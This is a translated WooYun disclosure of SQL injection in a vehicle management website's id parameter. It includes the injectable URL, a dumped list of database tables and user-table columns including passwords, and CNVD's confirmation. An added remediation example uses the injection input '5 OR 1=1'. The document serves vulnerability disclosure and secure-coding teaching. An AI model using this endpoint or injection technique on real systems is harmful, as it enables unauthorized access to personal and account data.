WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
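2015-09-10: Details reported to the vendor; awaiting vendor handling
2015-09-11: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the notifying body
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to intern white hats
2015-10-26: Details disclosed to the public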
As the title says.
SQL injection: **.**.**.**/KnowladgeCenter/MsgView.aspx?id=5
Current database
All databases
Tables
Database: vms
[58 tables]
+----------------------+
| LocationHistorys     |
| Locations            |
| NewestLocations      |
| Suppliers            |
| Vehicle_admin_info   |
| Vehicle_contact_info |
| VmsActiveVehicles    |
| VmsApplyForms        |
| VmsArea              |
| VmsAreaApprove       |
| VmsCompany           |
| VmsDepartments       |
| VmsDrivers           |
| VmsFlowDefines       |
| VmsFlowDetails       |
| VmsFlows             |
| VmsKnowledges        |
| VmsMenus             |
| VmsMobilePower       |
| VmsMoblieMenu        |
| VmsMonitorPower      |
| VmsPoints            |
| VmsProcessFlow       |
| VmsProcessNode       |
| VmsProcessTemplate   |
| VmsRoads             |
| VmsRoleInMenus       |
| VmsRoles             |
| VmsSystemConfig      |
| VmsTasks             |
| VmsUserInRoles       |
| VmsUserSpecials      |
| VmsUsers             |
| VmsVehState          |
| VmsVehicleTypes      |
| VmsVehicles          |
| VmsWatchs            |
| accountToRole        |
| account_info         |
| baseStations         |
| department           |
| dispatch_info        |
| employee_info        |
| menu_info            |
| repair_company       |
| repair_cost          |
| role_info            |
| travel_cost          |
| vehicle_DailyMlg     |
| vehicle_accident     |
| vehicle_change       |
| vehicle_energy       |
| vehicle_info         |
| vehicle_items        |
| vehicle_mil_logs     |
| vehicle_mileage      |
| vehicle_repair       |
| vmsuserback          |
+----------------------+
Columns
Database: vms
Table: VmsUsers
[12 columns]
+------------+---------+
| Column     | Type    |
+------------+---------+
| CmpId      | int     |
| vcId       | int     |
| VuDpId     | int     |
| VuEmail    | varchar |
| VuId       | int     |
| VuName     | varchar |
| VuPassword | varchar |
| VuPhone    | varchar |
| VuPY       | varchar |
| VuRemark   | varchar |
| VuTrueName | varchar |
| VuVrId     | int     |
+------------+---------+
Account information
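Filter the parameter
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-09-11 14:03
CNVD confirmed and reproduced the reported issue and has passed it on through CNCERT to China Mobile Group, which will coordinate follow-up handling with the website's administrators.
None yet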
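
The fix suggested above is to filter the parameter; for a numeric `id` like the one in `MsgView.aspx?id=5`, the dependable form is strict integer parsing combined with a bound query parameter. The sketch below is an added example, not code from the report or the affected site: it uses Python with in-memory SQLite as a stand-in for the .aspx page's database, and the choice of `VmsKnowledges` as the queried table, its columns, the sample rows and all function names are constructed assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in table; column names and rows are assumptions."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE VmsKnowledges (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO VmsKnowledges VALUES (?, ?)",
        [(5, "Fleet handbook"), (6, "Internal memo")],
    )
    return conn


def view_unsafe(conn, raw_id):
    # 'Before': the request value becomes part of the SQL text itself,
    # so anything after the number is parsed as SQL.
    sql = "SELECT id, title FROM VmsKnowledges WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def view_bound(conn, raw_id):
    # Binding alone: the value travels as data and is never parsed as SQL.
    sql = "SELECT id, title FROM VmsKnowledges WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def parse_id(raw_id):
    # Allow-list validation: ASCII digits only, bounded length.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 9):
        raise ValueError("id must be a non-negative integer")
    return int(raw_id)


def view_safe(conn, raw_id):
    # 'After': reject malformed input early, then bind the typed value.
    return view_bound(conn, parse_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    tampered = "5 OR 1=1"  # constructed test input
    print("unsafe:", view_unsafe(db, tampered))
    print("bound :", view_bound(db, tampered))
    print("safe  :", view_safe(db, "5"))
```

The binding is what removes the injection; the integer check is defence in depth and lets the handler return a clean error instead of passing malformed input to the database.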